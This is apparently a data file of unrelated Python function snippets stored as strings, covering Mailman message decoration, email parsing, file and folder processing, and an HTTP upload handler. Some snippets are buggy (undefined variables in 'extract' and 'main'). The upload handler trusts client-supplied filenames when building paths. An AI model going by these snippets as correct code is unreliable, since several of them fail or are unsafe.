So, instead of\n # mgs.get_content_charset('us-ascii') ...\n mcset = msg.get_content_charset() or 'us-ascii'\n lcset = mlist.preferred_language.charset\n msgtype = msg.get_content_type()\n # BAW: If the charsets don't match, should we add the header and footer by\n # MIME multipart chroming the message?\n wrap = True\n if not msg.is_multipart() and msgtype == 'text/plain':\n # Save the RFC-3676 format parameters.\n format_param = msg.get_param('format')\n delsp = msg.get_param('delsp')\n # Save 'Content-Transfer-Encoding' header in case decoration fails.\n cte = msg.get('content-transfer-encoding')\n # header/footer is now in unicode.\n try:\n oldpayload = msg.get_payload(decode=True).decode(mcset)\n del msg['content-transfer-encoding']\n frontsep = endsep = ''\n if len(header) > 0 and not header.endswith('\\n'):\n frontsep = '\\n'\n if len(footer) > 0 and not oldpayload.endswith('\\n'):\n endsep = '\\n'\n payload = header + frontsep + oldpayload + endsep + footer\n # When setting the payload for the message, try various charset\n # encodings until one does not produce a UnicodeError. We'll try\n # charsets in this order: the list's charset, the message's\n # charset, then utf-8. It's okay if some of these are duplicates.\n for cset in (lcset, mcset, 'utf-8'):\n try:\n msg.set_payload(payload.encode(cset), cset)\n except UnicodeError:\n pass\n else:\n if format_param:\n msg.set_param('format', format_param)\n if delsp:\n msg.set_param('delsp', delsp)\n wrap = False\n break\n except (LookupError, UnicodeError):\n if cte:\n # Restore the original c-t-e.\n del msg['content-transfer-encoding']\n msg['Content-Transfer-Encoding'] = cte\n elif msg.get_content_type() == 'multipart/mixed':\n # The next easiest thing to do is just prepend the header and append\n # the footer as additional subparts\n payload = msg.get_payload()\n if not isinstance(payload, list):\n payload = [payload]\n if len(footer) > 0:\n mimeftr = MIMEText(footer.encode(lcset), 'plain', lcset)\n mimeftr['Content-Disposition'] = 'inline'\n payload.append(mimeftr)\n if len(header) > 0:\n mimehdr = MIMEText(header.encode(lcset), 'plain', lcset)\n mimehdr['Content-Disposition'] = 'inline'\n payload.insert(0, mimehdr)\n msg.set_payload(payload)\n wrap = False\n # If we couldn't add the header or footer in a less intrusive way, we can\n # at least do it by MIME encapsulation. We want to keep as much of the\n # outer chrome as possible.\n if not wrap:\n return\n # Because of the way Message objects are passed around to process(), we\n # need to play tricks with the outer message -- i.e. the outer one must\n # remain the same instance. So we're going to create a clone of the outer\n # message, with all the header chrome intact, then copy the payload to it.\n # This will give us a clone of the original message, and it will form the\n # basis of the interior, wrapped Message.\n inner = Message()\n # Which headers to copy? Let's just do the Content-* headers\n for h, v in msg.items():\n if h.lower().startswith('content-'):\n inner[h] = v\n inner.set_payload(msg.get_payload())\n # For completeness\n inner.set_unixfrom(msg.get_unixfrom())\n inner.preamble = msg.preamble\n inner.epilogue = msg.epilogue\n # Don't copy get_charset, as this might be None, even if\n # get_content_charset isn't. 
However, do make sure there is a default\n # content-type, even if the original message was not MIME.\n inner.set_default_type(msg.get_default_type())\n # BAW: HACK ALERT.\n if hasattr(msg, '__version__'):\n inner.__version__ = msg.__version__\n # Now, play games with the outer message to make it contain three\n # subparts: the header (if any), the wrapped message, and the footer (if\n # any).\n payload = [inner]\n if len(header) > 0:\n mimehdr = MIMEText(header.encode(lcset), 'plain', lcset)\n mimehdr['Content-Disposition'] = 'inline'\n payload.insert(0, mimehdr)\n if len(footer) > 0:\n mimeftr = MIMEText(footer.encode(lcset), 'plain', lcset)\n mimeftr['Content-Disposition'] = 'inline'\n payload.append(mimeftr)\n msg.set_payload(payload)\n del msg['content-type']\n del msg['content-transfer-encoding']\n del msg['content-disposition']\n msg['Content-Type'] = 'multipart/mixed'", "def process_data_group(folder:Path, type:str, light:bool = False) -> dict:\n\n if type == dm.Delivery:\n data_folder = folder / 'data'\n else:\n data_folder = folder\n\n # check for non-existent or empty folder\n if not data_folder.exists():\n raise FileNotFoundError\n try:\n next((data_folder).glob(\"**/*\"))\n except StopIteration:\n # folder is empty can't process it\n raise FileNotFoundError\n\n # Get file sizes, last modified dates, and names to count,\n # sum size, and hash the file data provided\n file_sizes, file_modified_dates, file_metamodified_dates, file_names = zip(\n *[\n (f.stat().st_size, f.stat().st_mtime, f.stat().st_ctime, f)\n for f in (data_folder).glob(\"**/*\")\n if f.is_file() and f.name != 'receipt.rst'\n ]\n )\n\n last_modified = datetime.fromtimestamp(\n max(max(file_modified_dates),\n max(file_metamodified_dates)))\n\n # Hash the files in the delivery\n if light:\n folder_hash = 'skipped'\n else:\n folder_hash = hash_files(file_names)\n\n dg = {\n 'name' : folder.name,\n 'type' : type.__name__,\n 'last_update' : datetime.now(),\n 'size' : sum(file_sizes),\n 'num_files' : len(file_sizes),\n 'group_hash' : folder_hash,\n 'group_last_modified' : last_modified,\n }\n\n return dg", "def fdparse(cls, value):\n try:\n q = cls.rgxl\n except AttributeError:\n cls.rgxl = re.compile(\"(.)([r-][w-][x-]){3}(\\s+\\S+){3}\" +\n \"(\\s+\\d+)(\\s+\\w{3}\\s+\\d+\\s+[\\d:]+)\" +\n \"\\s+(\\S+)\")\n cls.map = {'DIRECTORY': 'd',\n 'd': 'd',\n 'FILE': 'f',\n '-': 'f'}\n\n if any([value.startswith(\"FILE\"),\n value.startswith(\"DIRECTORY\")]):\n x = value.split('\\t')\n ptype = cls.map[util.pop0(x)]\n pname = util.pop0(x).strip()\n util.pop0(x)\n util.pop0(x)\n util.pop0(x)\n cart = util.pop0(x)\n if cart is not None:\n cart = cart.strip()\n cos = util.pop0(x)\n if cos is not None:\n cos = cos.strip()\n else:\n cos = ''\n return Checkable(path=pname, type=ptype, cos=cos, cart=cart)\n else:\n ltup = re.findall(cls.rgxl, value)\n if ltup:\n (type, ign1, ign2, ign3, ign4, fname) = ltup[0]\n return Checkable(path=fname, type=cls.map[type])\n return None", "def parse_rism_folder(self):\n self._set_job_name()\n self._find_named_files()\n self._load_files()\n self._parse_input()\n self._check_results()\n self._parse_results()\n self._load_molecule()\n self._calculate_runtime()", "def parseFilePath(self, filepath):\n\n li = filepath.split(\"/\") \n last = li[-1].split(\"_\")\n\n self.subjectName = li[-2]\n self.experimenterName = li[-3]\n self.experimentDate = last[-1]\n self.paradigm = last[-2]\n self.subjectName = last[-3]", "def extract (msgfile, key):\n m = email.message_from_file(msgfile)\n From, To, Subject, 
Date = caption(m)\n #Text, Html, Files, Parts = pullout(m, key)\n Text = Text.strip(); Html = Html.strip()\n msg = {\"subject\": Subject, \"from\": From, \"to\": To, \"date\": Date,\n \"text\": Text, \"html\": Html, \"parts\": Parts}\n if Files: msg[\"files\"] = Files\n return msg", "def parseOutText(f):\n\n\n f.seek(0) ### go back to beginning of file (annoying)\n all_text = f.read()\n ### split off metadata\n \n content = re.split(\"X-FileName:.*$\", all_text, flags=re.MULTILINE, maxsplit=1)\n words = \"\"\n if len(content) > 1:\n text_string = content[1]\n\n ## remove mails that are forwarded or to which are responded\n # e.g. ---------------------- Forwarded\"\n text_string = re.split(\"-*\\sForwarded\", text_string, maxsplit=1)[0]\n\n # -----Original Message-----\n text_string = re.split(\"-*\\Original\\sMessage\", text_string, maxsplit=1)[0]\n\n # Vince J Kaminski@ECT\n # 04/30/2001 02:28 PM\n # To:\tStanley Horton/Corp/Enron@Enron, Danny McCarty/ET&S/Enron@Enron\n # cc:\tVince J Kaminski/HOU/ECT@ECT \n # or\n # Vince J Kaminski@ECT\n # 04/30/2001 02:28 PM\n # to:\tStanley Horton/Corp/Enron@Enron, Danny McCarty/ET&S/Enron@Enron\n # cc:\tVince J Kaminski/HOU/ECT@ECT \n \n text_string = re.split(\"((.*\\n){2})[Tt]o:\\s\", text_string, maxsplit=1)[0]\n\n ### remove punctuation\n # should be autopmatically by scikit learn\n #text_string = text_string.translate(string.maketrans(\"\", \"\"), string.punctuation)\n\n ### project part 2: comment out the line below\n #words = text_string\n\n ### split the text string into individual words, stem each word,\n ### and append the stemmed word to words (make sure there's a single\n ### space between each stemmed word)\n from nltk.stem.snowball import SnowballStemmer\n\n stemmer = SnowballStemmer(\"english\")\n words = [stemmer.stem(word) for word in text_string.split()]\n\n\n\n return \" \".join(words)", "def _GetSubFileEntries(self):\n if self._directory is None:\n self._directory = self._GetDirectory()\n\n if self._directory:\n for path_spec in self._directory.entries:\n yield APMFileEntry(self._resolver_context, self._file_system, path_spec)", "def handle_file_retrieval(self, msg):\n Logger.info(\"Slave: Retrieving files\")\n params = msg.get_field(MessageKeys.params_key)\n host = msg.get_field(MessageKeys.sender_key)\n port = params[MessageKeys.ftp_port_key]\n subpath = params[MessageKeys.ftp_subpath_key]\n self.presentation.set_files(params[MessageKeys.presentation_content_key])\n self.presentation.reset()\n self.layout.init_presentation()\n self.retrieve_files_over_ftp(host, port, subpath)\n self.presentation_ended = False\n return self.create_response(msg.get_command())", "def Parse_folder_to_multi_faa(target_dir,faa_filename):\n os.chdir(target_dir)\n output_handle = open(faa_filename, \"w\")\n for gbk_filename in FileGen(target_dir):\n with open(gbk_filename, \"r\") as input_handle:\n for seq_record in SeqIO.parse(input_handle, \"genbank\") :\n print(\"Dealing with GenBank record %s\" % seq_record.id)\n for seq_feature in seq_record.features :\n if seq_feature.type==\"CDS\" :\n assert len(seq_feature.qualifiers['translation'])==1\n try:\n name = seq_feature.qualifiers['locus_tag'][0]\n except KeyError:\n name = seq_feature.qualifiers['product'][0]\n output_handle.write(\">%s from %s\\n%s\\n\" % (\n name,\n gbk_filename.split(\"/\")[-1],\n seq_feature.qualifiers['translation'][0])) \n output_handle.close()", "def download_attachment(self, msg):\n path = None\n for part in msg.walk():\n if part.get_content_type() == 'application/pdf':\n\n 
time_prefix = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")\n filename = time_prefix+\"-\"+part.get_filename()\n path = os.path.join(self._DOWNLOAD_FOLDER, filename)\n\n if not os.path.isfile(path):\n with open(path, 'wb') as fb:\n fb.write(part.get_payload(decode=True))\n\n self._processed = True\n return path, self.get_company(msg['From'], msg['To'])", "def getFiles(folderToProcess,filter):\n\n print(f\"Parsing {folderToProcess} for {filter} files\")\n\n if debug:\n for path in Path(folderToProcess).rglob(filter):\n print(f\"Found {path}\")\n\n all_files = [str(x) for x in Path(folderToProcess).rglob(filter)] \n\n return all_files", "def create_counterparty_dict(file_name) -> Dict[str, str]:\n dct = {}\n with open(file_name) as f:\n root_dir = f.readline().strip('\\n')\n for line in f:\n key, val = line.strip('\\n').split('!!!!')\n temp = val.split('==')\n d = {'path': root_dir + temp[0], 'to': temp[1:]}\n dct[key] = d\n return dct", "def main():\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n\n\n lists,nextPageToken = ListMessages(service,user_id = 'me',q='subject:tradingview')\n # print (lists)\n mes,mes_str = GetMimeMessage(service,user_id = 'me',msg_id = lists[0]['id'])\n print (mes)\n\n\n j = 0\n for part in mes.walk(): \n j = j + 1 \n fileName = part.get_filename() \n contentType = part.get_content_type() \n mycode=part.get_content_charset(); \n # 保存附件 \n if fileName:\n print ('hhhhhhhhhhhhh')\n elif contentType == 'text/plain' or contentType == 'text/html': \n #保存正文 \n data = part.get_payload(decode=True) \n content=str(data); \n # if mycode=='gb2312': \n # content= mbs_to_utf8(content) \n #end if \n # nPos = content.find('降息') \n # print(\"nPos is %d\"%(nPos)) \n # print >> f, data \n # 正则替换掉所有非 <a></a>的标签 <[^>|a]+>\n # reg = re.compile('<[^>|a]+>')\n contentTxt = re.compile('<[^>|a]+>').sub('',content)\n print (reg.sub('',content))\n #end if \n\n\n \n # help(mes)\n # for i in mes.values():\n # print (i)\n # # print (mes[i]);\n # print (\"----------\")\n # print (mes['from'])\n # print (type (mes))\n # # print \n # parsed = Parser().parsestr(mes)\n # print (parsed)\n # print (mes)\n # for i in mes:\n # print (i)\n # for item in lists:\n # mes = GetMimeMessage(service,user_id = 'me',msg_id = item['id'])\n # # print (mes)\n # parsed = Parser().parsestr(mes)\n # print (parsed)", "def get_data_file():\n this_directory = os.path.dirname(__file__)\n parent_directory = os.path.dirname(this_directory)\n return os.path.join(parent_directory, '_data/fortunes.txt')", "def _parse_transcription_file(self, root: str, name: str) -> None:\n trans_path = os.path.join(root, name)\n with open(trans_path, \"r\", encoding=\"utf-8\") as trans:\n # Each line has the form \"ID THE TARGET TRANSCRIPTION\"\n for line in trans:\n id_, transcript = line.split(maxsplit=1)\n dropped = self._process_audio(root, id_)\n if not dropped:\n self._process_transcript(transcript)", "def get_make_contact(root):\n root_split = root.split('/')\n\n contact_name = root_split[-1]\n #groupchat's folder's end with .chat\n group_chat = False\n if contact_name.endswith(\".chat\"):\n contact_name = contact_name[:-5]\n group_chat = True\n\n account_name = root_split[-2]\n protocol_name = root_split[-3]\n\n protocol_contained = None\n for protocol in protocols:\n if protocol.name == protocol_name:\n protocol_contained = protocol\n break\n if not protocol_contained:\n protocol_contained = Protocol(protocol_name)\n 
protocols.append(protocol_contained)\n\n account_contained = protocol_contained.contains_account(account_name)\n if not account_contained:\n account_contained = Account(account_name)\n protocol_contained.add_account(account_contained)\n\n contact_contained = account_contained.contains_contact(contact_name)\n if not contact_contained:\n contact_contained = Contact(contact_name, group_chat)\n account_contained.add_contact(contact_contained)\n\n return contact_contained, account_contained", "def process_files(file_location, day):\n # construct file path\n file_dir = PREFIX+file_location\n file_pattern = file_dir+'lz_'+day+'*_raw.root'\n # print(file_pattern)\n file_list = glob.glob(file_pattern)\n print(\"There are %s MC files in the requested directory (%s).\" %(len(file_list), file_dir))\n file_names = []\n for f in file_list:\n file_name_only = f.split('/')\n file_names.append(file_name_only[-1])\n return file_names", "def getFileList(outputpoolfcstring):\n\n pfc_name = outputpoolfcstring.split(':', 1)[1] \n xmldoc = minidom.parse(pfc_name) \n\n return xmldoc.getElementsByTagName(\"File\")", "def _parse_ach_file(self, contents):\n file_length = len(contents)\n\n for index in range(0, file_length, self.LINE_LENGTH):\n line = contents[index:index + self.LINE_LENGTH]\n\n if line.startswith('1'):\n self._read_header(line)\n elif line.startswith('5'):\n self._read_batch_header(line)\n elif line.startswith('6'):\n self._read_entry_detail(line)\n elif line.startswith('7'):\n self._read_addenda_record(line)\n elif line.startswith('8'):\n self._read_batch_control_record(line)\n elif line.startswith('9'):\n if line == '9' * 94:\n continue\n self._read_file_control_record(line)", "def getFilesToBeCopied(self):\n\n local_data_dirs = self.LocalDataDirPaths\n filesToBeCopiedDict = {} ### A dict with LFN as the key and local-PFN as the value for files to be copied\n ### Loop over all directories\n for local_data_dir in local_data_dirs:\n ### Make sure the agent does not copy more than specified files in one cycle. This is good for stopping agent cleanly if need be\n if len(filesToBeCopiedDict) >= self.MaxFilesToTransferPerCycle: break\n ### Do OS walk over local_data_dir (ROACH (.egg) or RSA (.MAT))\n for currentdir, subdirs, filenames in os.walk(local_data_dir):\n ### Make sure the agent does not copy more than specified files in one cycle. This is good for stopping agent cleanly if need be\n if len(filesToBeCopiedDict) >= self.MaxFilesToTransferPerCycle: break\n gLogger.debug('In dir: %s . It has these many files (%s)' % (currentdir, len(filenames)))\n ### Sort file names\n filenames.sort()\n for filename in filenames:\n gLogger.debug('Found filename: %s' % filename)\n ### Make sure file ends in acceptable suffix.\n if not filename.endswith(tuple(self.acceptableFileSuffix)):\n ### Go to next file\n continue\n \n pfn = os.path.join(currentdir, filename)\n sub_lfn = pfn.split(local_data_dir)[-1].strip(\"/\")\n lfn = os.path.join( self.SEDataDirPath, pfn.split(local_data_dir)[-1].strip(\"/\") )\n gLogger.debug('pfn/sub_lfn/lfn: %s -- %s -- %s' % (pfn,sub_lfn,lfn))\n filesToBeCopiedDict[lfn] = pfn\n ### Make sure the agent does not copy more than specified files in one cycle. 
This is good for stopping agent cleanly if need be\n if len(filesToBeCopiedDict) >= self.MaxFilesToTransferPerCycle: break\n\n\n ### Now We have a queue of files that need to be transferred (if not already transferred)\n gLogger.info('Potentially these many files will be copied in this cycle - %s' % len(filesToBeCopiedDict))\n if len(filesToBeCopiedDict) == 0:\n return S_OK( {} )\n \n ### Lets first check if the files are already in the DFC\n res_FC = self.fc.getReplicas(filesToBeCopiedDict.keys())\n if not res_FC['OK']:\n msg = 'Could not query FC with getReplicas(). Message is : %s' %res_FC['Message']\n gLogger.error(msg)\n return S_ERROR(msg)\n res_FC_Value = res_FC['Value']\n if 'Successful' in res_FC_Value and res_FC_Value['Successful']:\n ### This means that the files are already in the catalog (FC)\n lfns_in_FC = res_FC_Value['Successful'].keys()\n gLogger.warn('Found some files already in the catalog. Will verify and delete them locally. Here is the file dict : %s' %res_FC_Value['Successful'])\n ### verify and delete local copy of files that are already in FC\n localFilesAlreadyCopiedDict = { lfn:filesToBeCopiedDict[lfn] for lfn in res_FC_Value['Successful'] }\n self.verifyAndDeleteAlreadyRegisterdFiles(res_FC_Value['Successful'], localFilesAlreadyCopiedDict)\n\n lfns_tobeCopied = []\n if 'Failed' in res_FC_Value and res_FC_Value['Failed']:\n ### This means that the files are NOT in the catalog (FC) and can be copied\n lfns_tobeCopied = res_FC_Value['Failed'].keys()\n \n ### Copy only those files that are not in FC\n filesToBeCopiedDict = { lfn:filesToBeCopiedDict[lfn] for lfn in lfns_tobeCopied }\n \n return S_OK( filesToBeCopiedDict )", "def getAnnotationData(annotatedFolderPathList):\n enList, frList, refList, annotList = [], [], [], []\n # be sure the format is right\n if type(annotatedFolderPathList) is str:\n annotatedFolderPathList = [annotatedFolderPathList]\n # get the lists of annotations and sentences\n for path in annotatedFolderPathList:\n sentEnPath = u'{0}sample.en'.format(path)\n sentFrPath = u'{0}sample.fr'.format(path)\n sentAnnotPath = u'{0}sampleAnnotation.tsv'.format(path)\n sentRefPath = u'{0}sampleReference.tsv'.format(path)\n enList, frList, refList, annotList = extractLineData(sentEnPath, sentFrPath, sentRefPath, sentAnnotPath,\n enList, frList, refList, annotList)\n return enList, frList, refList, annotList", "def process_data(self):\n\t\t\n\t\tboundary = self.headers.plisttext.split('=')[1]\n\t\tremain = int(self.headers['content-length'])\n\t\t\n\t\t#Check whether file is started with boundary\n\t\tline = self.rfile.readline()\n\t\tremain -= len(line)\n\t\tif boundary not in line:\n\t\t\treturn False,\"File does not begin with boundary.\"\n\t\t\n\t\t#Get disposition info\t\t\n\t\tline = self.rfile.readline()\n\t\tremain -= len(line)\n\t\t\n\t\t#Check file info \n\t\tfilename = re.findall(r'Content-Disposition.*name=\"file\"; filename=\"(.*)\"',line)\n\t\tif not filename:\n\t\t\treturn False,\"Missing file name.\"\n\t\tpath = self.translate_path(self.path)\n\t\tprint path\n\t\tfilename = os.path.join(path,filename[0])\n\t\t\n\t\t#Check whether file name exists\n\t\twhile os.path.exists(filename):\n\t\t\tfilename = filename.split('.')[0]+'+'+filename.split('.')[1]\n\t\t\t\n\t\t\n\t\t#Get content type info\n\t\tline = self.rfile.readline()\n\t\tremain -= len(line)\n\t\tfiletype = re.findall(r'Content-Type: (.*).*',line)\n\t\tline = self.rfile.readline() #it is an empty line\n\t\tremain -= len(line)\n\t\t\n\t\t#Content begins, try writing data to file in 
server\n\t\ttry:\n\t\t\toutput = open(filename,'wb')\n\t\texcept IOError:\n\t\t\treturn False,\"Authority denied.\"\n\t\t\n\t\t#Write data\n\t\tfirstline = self.rfile.readline()\n\t\tremain -= len(firstline)\n\t\twhile remain > 0:\n\t\t\tline = self.rfile.readline()\n\t\t\tremain -= len(line)\n\t\t\tif boundary in line:\n\t\t\t\tfirstline = firstline[0:-1]\n\t\t\t\tif firstline[-1] == '\\r':\n\t\t\t\t\tfirstline = firstline[0:-1]\n\t\t\t\toutput.write(firstline)\n\t\t\t\toutput.close()\n\t\t\t\treturn True,\"File created.Path: %s\" % filename\n\t\t\telse:\n\t\t\t\toutput.write(firstline)\n\t\t\t\tfirstline = line\n\t\treturn False,\"Unexpected file end.\"", "def parse_message(message, selector):\n\n msg = message.decode('utf-8')\n print(colored(\"Telnet pide \" + msg, 'magenta'))\n\n # Mandó list?\n clist = re.match(r'list', msg)\n if clist:\n return armar_lista()\n\n # Mandó offer?\n else:\n offer = re.match(r'offer (.*)\\r', msg)\n if offer:\n filename = offer[1] \n\n file_path = os.getcwd() + \"/files/\" + filename\n\n if os.path.exists(file_path):\n sizefile = int(os.path.getsize(file_path))\n\n # Calcula el md5\n with open(file_path, \"rb\") as f:\n file_hash = hashlib.md5()\n chunk = f.read(8192)\n while chunk:\n file_hash.update(chunk)\n chunk = f.read(8192)\n\n file_hash = file_hash.hexdigest()\n\n aux_file = AppFile(filename, sizefile, file_hash)\n\n # Guardamos el archivo en nuestro diccionario de seguimiento local\n local_files[file_hash] = aux_file\n\n # Lo borramos del de los disponibles remotos\n if remote_files.get(file_hash):\n del remote_files[file_hash]\n\n # Una vez actualizada la lista de archivos locales, mandamos a actualizar los anuncios\n announce_forever.set_announcements()\n\n return 'ARCHIVO AGREGADO'\n\n else:\n return 'ARCHIVO NO ENCONTRADO'\n\n\n # Mandó get?\n else:\n get = re.match(r'get (\\d*)\\r\\n', msg)\n if get:\n file_id = int(get[1])\n msg = f'INICIANDO DESCARGA DEL ARCHIVO {file_id}'\n print(msg)\n request_download(file_id, selector)\n return msg\n\n return 'COMANDO INCORRECTO!'", "def search(folderName):\n\n result, data = mailBox.select(folderName, True)\n\n if TESTING:\n searchResult, uid = mailBox.uid('SEARCH', None, 'UNSEEN')\n else:\n searchResult, uid = mailBox.uid('SEARCH', None, 'ALL')\n\n number_messages = len(uid[0].split(' ')) if uid[0] != \"\" else 0\n if number_messages == 0:\n print \"\\nERROR: No messages found in %s\\n\" % folderName\n print \"\\n* Exiting... 
*\\n\"\n sys.exit(0)\n print \"\\nNumber of messages in %s: %d\" % (folderName, number_messages)\n\n uidList = \"\"\n for i in uid[0].split(' '):\n if i.isdigit():\n uidList += i + \",\"\n uidList = uidList[:-1]\n\n return uidList", "def clean_data(self, path, exclude_msgtypes=None):", "def prepare_training_data(self, data_folder_path):\n\n #get the directories (one directory for each subject) in data folder\n dirs = os.listdir(data_folder_path)\n\n #list to hold all subject faces\n faces = []\n #list to hold labels for all subjects\n labels = []\n #List to hold subject names\n subjects = []\n\n label = -1;\n #let's go through each directory and read images within it\n for dir_name in dirs:\n\n #ignore system files like .DS_Store\n if dir_name.startswith(\".\"):\n continue;\n\n label += 1\n subjects.append(dir_name)\n logger.info(\"label=%d subject=%s\" %(label, dir_name))\n\n #build path of directory containing images for current subject subject\n #sample subject_dir_path = \"training-data/Bruce\"\n subject_dir_path = data_folder_path + \"/\" + dir_name\n\n #get the images names that are inside the given subject directory\n subject_images_names = os.listdir(subject_dir_path)\n\n #go through each image name, read image,\n #detect face and add face to list of faces\n for image_name in subject_images_names:\n\n #ignore system files like .DS_Store\n if image_name.startswith(\".\"):\n continue;\n\n #sample image path = training-data/Bruce/face1.png\n image_path = subject_dir_path + \"/\" + image_name\n image = cv2.imread(image_path)\n logger.info(\"file size: %d. numpy image size: %d\" %(os.path.getsize(image_path), len(image)))\n face, rect = self.detect_face(image)\n\n #we will ignore faces that are not detected\n if face is not None:\n #add face to list of faces\n faces.append(face)\n #add label for this face\n labels.append(label)\n\n return faces, labels, subjects", "def _parse_contact_information(self):\n left_column = self.content.find(\"div\", class_=\"linkeSpalte40\")\n graubox = left_column.find(\n lambda tag: tag.name == \"div\" and tag[\"class\"] == [\"grauBox\"]\n )\n\n emails_raw = graubox.find_all(\"a\", class_=\"mail\")\n websites_raw = graubox.find_all(\"a\", class_=\"noDecoration\")\n telephone_raw = graubox.find_all(\"span\", class_=\"telefonnummer\")\n address_raw = [\n e.nextSibling for e in graubox.find_all(\"em\") if e.text == \"Anschrift:\"\n ]\n\n address = address_raw[0].li.get_text(\"\\n\") if address_raw else None\n emails = [re.sub(r\"^mailto:\", \"\", e.attrs[\"href\"]) for e in emails_raw]\n phone_numbers = [t.text for t in telephone_raw]\n websites = [w.attrs[\"href\"] for w in websites_raw]\n\n return {\n \"address\": address,\n \"emails\": emails,\n \"phone_numbers\": phone_numbers,\n \"websites\": websites,\n }", "def parse_BC5CDR(kb_data):\n\n print(\"Parsing BC5CDR corpus...\")\n output_BC5CDR = dict()\n\n if kb_data.kb == \"medic\":\n entity_type = \"Disease\"\n \n elif kb_data.kb == \"ctd_chemicals\":\n entity_type = \"Chemical\"\n\n corpus_dir = \"./retrieved_data/corpora/BioCreative-V-CDR-Corpus/CDR_Data/CDR.Corpus.v010516/\" \n filenames = [\"CDR_TrainingSet.PubTator.txt\", \"CDR_DevelopmentSet.PubTator.txt\", \"CDR_TestSet.PubTator.txt\"]\n\n for filename in filenames:\n with open(corpus_dir + filename, 'r', encoding=\"utf-8\") as corpus_file:\n data = corpus_file.readlines()\n corpus_file.close()\n\n for line in data:\n line_data = line.split(\"\\t\")\n file_id = line_data[0]\n \n if len(line_data) == 6 and line_data[4] == entity_type:\n mesh_id = 
\"MESH:\" + line_data[5].strip(\"\\n\") \n \n if mesh_id in kb_data.child_to_parent.keys():\n direct_ancestor = \"https://id.nlm.nih.gov/mesh/\" \\\n + kb_data.child_to_parent[mesh_id].strip(\"MESH:\")\n update_mesh_id = \"https://id.nlm.nih.gov/mesh/\" + line_data[5].strip(\"MESH:\").strip(\"\\n\")\n annotation = (line_data[3], line_data[1], line_data[2], update_mesh_id, direct_ancestor)\n output_BC5CDR = add_annotation_to_output_dict(file_id, annotation, output_BC5CDR)\n\n print(\"...Done!\")\n return output_BC5CDR", "def process_line(log_line):\n splt = log_line.split(maxsplit=5)\n folder_list = splt[-1].split(\"/\")\n return [f.strip() for f in folder_list]", "def get_data_file_paths(input_folder: str, data_file_prefix: str = \"\",\n data_file_postfix: str = \".nc\") -> list:\n data_file_paths = list()\n # we look at all subfolders, whatever they are named\n subfolders = get_files(input_folder, keep_path=True, order_numerical=True)\n for subfolder in subfolders:\n data_files = get_files(subfolder, prefix=data_file_prefix,\n postfix=data_file_postfix, keep_path=True,\n order_numerical=True)\n data_file_paths += data_files\n return data_file_paths", "def get_folder_contact(contact_id: Optional[str] = None,\n folder_id: Optional[str] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetFolderContactResult:\n __args__ = dict()\n __args__['contactId'] = contact_id\n __args__['folderId'] = folder_id\n opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)\n __ret__ = pulumi.runtime.invoke('google-native:essentialcontacts/v1:getFolderContact', __args__, opts=opts, typ=GetFolderContactResult).value\n\n return AwaitableGetFolderContactResult(\n email=pulumi.get(__ret__, 'email'),\n language_tag=pulumi.get(__ret__, 'language_tag'),\n name=pulumi.get(__ret__, 'name'),\n notification_category_subscriptions=pulumi.get(__ret__, 'notification_category_subscriptions'),\n validate_time=pulumi.get(__ret__, 'validate_time'),\n validation_state=pulumi.get(__ret__, 'validation_state'))", "def parse_os2_font_directory(data):\n logging.debug('Parsing font directory')\n try:\n # If a font directory exists we use that to find the face's\n # resource ID, as in this case it is not guaranteed to have\n # a type of OS2RES_FONTFACE (7).\n fontdir = OS2FONTDIRECTORY.from_bytes(data)\n data = data[OS2FONTDIRECTORY.size:]\n if len(data) >= fontdir.usnFonts * OS2FONTDIRENTRY.size:\n direntry_type = OS2FONTDIRENTRY\n else:\n direntry_type = OS2FONTDIRENTRY_SMALL\n entries = direntry_type.array(fontdir.usnFonts).from_bytes(data)\n return entries\n except ValueError as e:\n logging.debug('Failed to parse font directory: %s', e)\n return ()", "def read_total_com_file(self, datadir='.'):\n\n filename = 'total_com.txt'\n fullname = Path(datadir) / filename\n\n return self.read_file(fullname)", "def create_json_from_email(self):\n logging.basicConfig(level=logging.DEBUG)\n logging.debug('Started email to json parsing')\n\n yaml_file_path = self.get_yaml_file()\n yaml_loader = YAMLLoader(yaml_file_path)\n instruction = yaml_loader.parse_yaml()\n if instruction is None:\n return 'Error : Instructions are empty'\n\n email_parser = EmailParser(instruction)\n files_created = 0\n for eml in glob.glob(f\"{instruction.msg_file_path}/*.eml\"):\n email_data = email_parser.get_email_meta(eml)\n if email_data:\n is_created = JsonUtils.create_json_file(email_data, instruction.msg_file_path)\n if is_created:\n files_created += 1\n\n return f'{files_created} json files created'", "def 
parse_webhook_data(self, data):\n\n message = data['message']\n\n self.chat_id = message['chat']['id']\n self.incoming_message_text = message['text'].lower()\n self.first_name = message['from']['first_name']\n if 'last_name' in message['from']:\n self.last_name = message['from']['last_name']", "def parse_and_validate_data_dir(data_dir):\n paths = [data_dir] + [os.path.join(data_dir, name) for name in FILE_NAMES]\n exists = [(path, os.path.exists(path)) for path in paths]\n try:\n for path, exist in exists:\n if not exist:\n raise ValidationError(path)\n except ValidationError as err:\n print USAGE_STR.format(sys.argv[0])\n print DATA_DIR_ERR.format(err.args[0])\n sys.exit()\n return data_dir", "def parseInputFileList (self):\n filelist = []\n try:\n with open (self.cfgName) as fIn:\n for line in fIn:\n line = (line.split(\"@@@\")[0]).strip()\n if line:\n self.lines.append(line)\n except IOError:\n print \"*** WARNING: label cfg file \" , self.cfgName , \" not found\"\n return", "def get_from_email(column_names, start_dates, end_dates, mail_server,\n account, sender, password):\n time_flag = None\n dfs = {test: pd.DataFrame(columns=column_names[test]) \\\n for test in [\"covid_ag\", \"flu_ag\"]}\n start_date = compare_dates(start_dates[\"covid_ag\"],\n start_dates[\"flu_ag\"], \"s\")\n end_date = compare_dates(end_dates[\"covid_ag\"],\n end_dates[\"flu_ag\"], \"l\")\n\n with MailBox(mail_server).login(account, password, 'INBOX') as mailbox:\n for search_date in [start_date + timedelta(days=x)\n for x in range((end_date - start_date).days + 1)]:\n for message in mailbox.fetch(A(AND(date=search_date.date(), from_=sender))):\n for att in message.attachments:\n name = att.filename\n\n # Check the test type\n if \"Sars\" in name:\n test = \"covid_ag\"\n elif \"Flu\" in name:\n test = \"flu_ag\"\n else:\n continue\n\n # Check whether we pull the data from a valid time range\n whether_in_range = check_whether_date_in_range(\n search_date, start_dates[test], end_dates[test])\n if not 